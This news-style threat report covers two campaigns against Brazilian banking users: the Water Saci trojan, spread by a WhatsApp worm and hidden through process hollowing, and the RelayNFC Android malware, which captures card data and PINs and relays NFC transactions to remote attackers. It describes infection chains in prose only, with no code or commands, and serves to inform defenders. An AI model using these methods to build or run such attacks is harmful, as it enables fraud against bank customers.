Brazil’s robust financial sector is currently contending with a highly sophisticated and multifaceted cyber offensive, where criminal actors are simultaneously refining old tactics and pioneering new ones to defraud consumers and institutions. This dual-pronged assault illustrates a significant escalation in the complexity of cybercriminal operations, moving beyond simple malware to orchestrated campaigns that exploit user trust in communication platforms and the convenience of modern payment technologies. One campaign features the notorious threat actor Water Saci, which has deployed a potent banking trojan through a self-propagating worm on WhatsApp. At the same time, a novel Android malware named RelayNFC has emerged, specifically engineered to execute real-time fraud against contactless payment systems, signaling a dangerous new frontier in financial crime. Together, these threats paint a vivid picture of an adaptive and relentless adversary targeting one of Latin America’s largest economies.
The Evolving Playbook of a Sophisticated Trojan
The threat actor known as Water Saci is actively demonstrating a significant evolution in its operational playbook by deploying a multi-stage infection chain designed to circumvent conventional security measures and maximize its reach among Brazilian banking customers. The attack initiates through a clever social engineering tactic that leverages the inherent trust of personal communication networks. Victims receive deceptive messages on WhatsApp, often appearing to be from known contacts, which contain malicious attachments in either PDF or HTA format. The PDF lure deceives the user with a prompt to update their Adobe Reader software, embedding a link that triggers the infection. The HTA file, however, is more direct, executing an embedded Visual Basic Script that uses PowerShell commands to fetch subsequent payloads from a remote server. Both paths lead to the download of an MSI installer package carrying the primary banking trojan and a highly advanced Python-based script. This script, a notable upgrade from the group’s previous reliance on PowerShell, is engineered to propagate the malware in a worm-like fashion, showcasing enhanced browser compatibility, improved error handling, and faster automation through WhatsApp Web, making it a far more resilient and effective tool for spreading the infection.
Once the initial compromise is successful, the MSI installer deploys the banking trojan via an AutoIt script, which manages its execution and ensures stealth. This script first verifies the presence of a marker file to prevent multiple instances from running simultaneously, a common technique to avoid detection and system instability. Upon successful execution, it signals a new infection to an attacker-controlled command-and-control server. The trojan’s design reveals its exclusive focus on the Brazilian market, as one of its first actions is to check if the Windows system language is set to Portuguese (Brazil); it will not proceed otherwise. Following this check, it conducts extensive reconnaissance on the compromised system, scanning for folders associated with major Brazilian financial institutions like Bradesco, Itaú, and Sicoob, as well as security software. It meticulously analyzes the user’s browser history for visits to a hard-coded list of prominent banking websites. This detailed data gathering allows the malware to confirm it has infected a valuable target before initiating its primary payload, which involves injecting itself into a legitimate Windows process, svchost.exe, using a technique known as process hollowing to evade detection while it monitors for opportunities to steal credentials.
A New Frontier in Contactless Payment Fraud
Concurrent with Water Saci’s campaign, Brazil’s financial ecosystem is facing a novel threat from RelayNFC, a previously undocumented Android malware engineered to conduct sophisticated Near-Field Communication relay attacks. This malware enables attackers to capture contactless payment data and execute fraudulent transactions from a remote location. RelayNFC is primarily distributed through targeted phishing campaigns that direct potential victims to decoy websites with Portuguese-language content, which masquerade as security platforms offering protection for payment cards. Users are tricked into downloading and installing the malicious application, believing it to be a legitimate tool to safeguard their financial information. Once installed, the malware operates with deceptive simplicity, instructing the victim to tap their physical NFC-enabled credit or debit card against their own phone. Acting as an NFC reader, the malware captures the card’s data and then displays a prompt asking the user to enter their four or six-digit PIN. This complete set of credentials—both the card data and the PIN—is immediately transmitted over a WebSocket connection to a server controlled by the attackers, setting the stage for real-time fraud.
The “relay” component of the attack is what makes this malware particularly dangerous. An attacker, equipped with a Point-of-Sale emulator device, can be located anywhere in the world while initiating a transaction. The command-and-control server acts as a bridge, relaying the transaction data, known as Application Protocol Data Units, from the attacker’s device to the victim’s infected phone in real time. RelayNFC receives these commands and forwards them to the phone’s NFC subsystem, which then communicates directly with the physical card still held against it by the unsuspecting victim. This creates a seamless, remote link that allows the attacker to complete a transaction as if the victim’s card were physically present at their location. The malware is built using React Native and Hermes bytecode, a combination that significantly complicates static analysis and helps it evade detection by most mobile security solutions. Investigators have also uncovered evidence of ongoing development, including a separate phishing site distributing an application with a partial implementation of Host Card Emulation. If fully realized, this feature would allow an even more streamlined attack, enabling the direct transmission of interactions between a legitimate POS terminal and an attacker’s device.
An Escalating Landscape of Financial Cybercrime
The simultaneous emergence of these two highly distinct campaigns demonstrated a critical shift in the cyber threat landscape targeting Brazil. The Water Saci operation revealed how established threat actors continued to refine their methods, leveraging popular communication platforms and potentially AI-driven development to deploy a powerful, reconnaissance-aware banking trojan with impressive propagation capabilities. This campaign highlighted a commitment to improving the efficiency and stealth of traditional malware attacks. In parallel, the rise of RelayNFC signaled the successful expansion of financial fraud into the burgeoning realm of contactless payments, a domain previously considered more secure. This attack showcased criminals’ ability to innovate rapidly, developing specialized tools to exploit modern technologies and user behaviors. Both threats underscored a clear and troubling trend: cybercriminals were no longer relying on a single methodology but were actively diversifying their portfolios, combining advanced social engineering, technical obfuscation, and the exploitation of new payment ecosystems to bypass defenses and defraud users on an unprecedented scale. This strategic pivot indicated a more mature and dangerous adversary capable of launching complex, parallel operations to maximize their financial returns.
